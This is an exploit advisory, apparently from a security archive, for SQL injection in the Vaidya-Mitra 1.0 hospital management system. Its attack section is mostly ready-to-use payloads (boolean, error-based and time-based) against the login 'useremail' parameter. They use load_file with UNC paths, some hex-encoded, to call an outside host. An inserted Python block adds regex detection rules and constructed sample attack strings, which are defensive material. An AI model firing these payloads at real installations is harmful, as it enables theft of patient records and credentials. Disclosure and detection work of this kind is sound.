
Vaidya-Mitra 1.0 SQL Injection

Posted Jul 13, 2023
Authored by nu11secur1ty

Vaidya-Mitra version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, sql injection
SHA-256 | d1bb8d0b88a7cb0ec1b4eb06d18e4406844f4952496160e85e2fce0c91237440

## Title: Vaidya-Mitra 1.0 Multiple - SQLi
## Author: nu11secur1ty
## Date: 07.12.2023
## Vendor: https://mayurik.com/
## Software: free:
https://www.sourcecodester.com/php/16720/free-hospital-management-system-small-practices.html,
https://mayurik.com/source-code/P5890/best-hospital-management-system-in-php
## Reference: https://portswigger.net/web-security/sql-injection

## Description:
The `useremail` parameter appears to be vulnerable to SQL injection
attacks. The payload '+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+'
was submitted in the `useremail` parameter. This payload injects a SQL
sub-query that calls MySQL's load_file function with a UNC file path
that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. An attacker can easily steal all information from this
system, such as login credentials and phone numbers.

STATUS: HIGH Vulnerability

[+]Payload:
```mysql
---
Parameter: useremail (POST)
Type: boolean-based blind
Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY
or GROUP BY clause
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
RLIKE (SELECT (CASE WHEN (5532=5532) THEN
0x6d61797572692e696e666f737061636540676d61696c2e636f6d+(select
load_file(0x5c5c5c5c6c726730667377767533773131677039727237656b33623734796172796c6d637030686e3762772e6f6173746966792e636f6d5c5c6d6576))+''
ELSE 0x28 END)) AND 'tsyu'='tsyu&userpassword=rootadmin

Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or
GROUP BY clause (FLOOR)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
AND (SELECT 3518 FROM(SELECT COUNT(*),CONCAT(0x716a766a71,(SELECT
(ELT(3518=3518,1))),0x71626a6b71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND
'gHln'='gHln&userpassword=rootadmin

Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)
Payload: useremail=mayuri.infospace@gmail.com'+(select
load_file('\\\\lrg0fswvu3w11gp9rr7ek3b74yarylmcp0hn7bw.tupaputka.com\\mev'))+''
OR (SELECT 4396 FROM (SELECT(SLEEP(3)))iEbq) AND
'ZWBa'='ZWBa&userpassword=rootadmin
---

```
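One way to flag the payload classes listed above in captured login requests, as an added Python example that is not part of the advisory or the vendor's code. The rule names, the `scan_login_body` and `make_body` helpers, and every sample body are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, urlencode

# Signatures derived from the payload classes quoted in the advisory.
# Rule names are this example's own labels (assumption, not a standard).
RULES = {
    "load_file_unc": re.compile(r"load_file\s*\(\s*(?:'\\\\|0x5c5c)", re.I),
    "boolean_rlike_case": re.compile(r"\bRLIKE\s*\(\s*SELECT\s*\(\s*CASE\s+WHEN", re.I),
    "error_floor_rand": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", re.I),
    "time_sleep": re.compile(r"\bSLEEP\s*\(\s*\d+\s*\)", re.I),
}


def scan_login_body(body: str, param: str = "useremail") -> list:
    """Return the rule names that match the URL-decoded value of `param`."""
    values = parse_qs(body, keep_blank_values=True).get(param, [])
    return [name for name, rx in RULES.items() if any(rx.search(v) for v in values)]


def make_body(email: str) -> str:
    """Build a form-encoded login body the way a browser would (constructed input)."""
    return urlencode({"useremail": email, "userpassword": "placeholder"})


# Constructed sample bodies; hosts and addresses are placeholders, not from the advisory.
SAMPLES = {
    "benign": make_body("nurse@clinic.example"),
    "oob": make_body(r"a@b.example'+(select load_file('\\\\host.example.invalid\\x'))+'"),
    "oob_hex": make_body("a@b.example'+(select load_file(0x5c5c5c5c61))+'"),
    "boolean": make_body("a@b.example' RLIKE (SELECT (CASE WHEN (1=1) "
                         "THEN 0x61 ELSE 0x28 END)) AND 'a'='a"),
    "error": make_body("a@b.example' AND (SELECT 1 FROM(SELECT COUNT(*),"
                       "CONCAT(0x71,FLOOR(RAND(0)*2))x "
                       "FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'a'='a"),
    "time": make_body("a@b.example' OR (SELECT 1 FROM (SELECT(SLEEP(3)))t) AND 'a'='a"),
}

if __name__ == "__main__":
    for label, body in SAMPLES.items():
        print(f"{label:8} -> {scan_login_body(body) or 'clean'}")
```

Signature matching only surfaces probing like this in logs or at a filter; the underlying fix is to bind `useremail` as a parameter in a prepared statement instead of concatenating it into the query.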

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2023/Vaidya-Mitra-1.0)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/07/vaidya-mitra-10-multiple-sqli.html)

## Time spent:
00:27:00

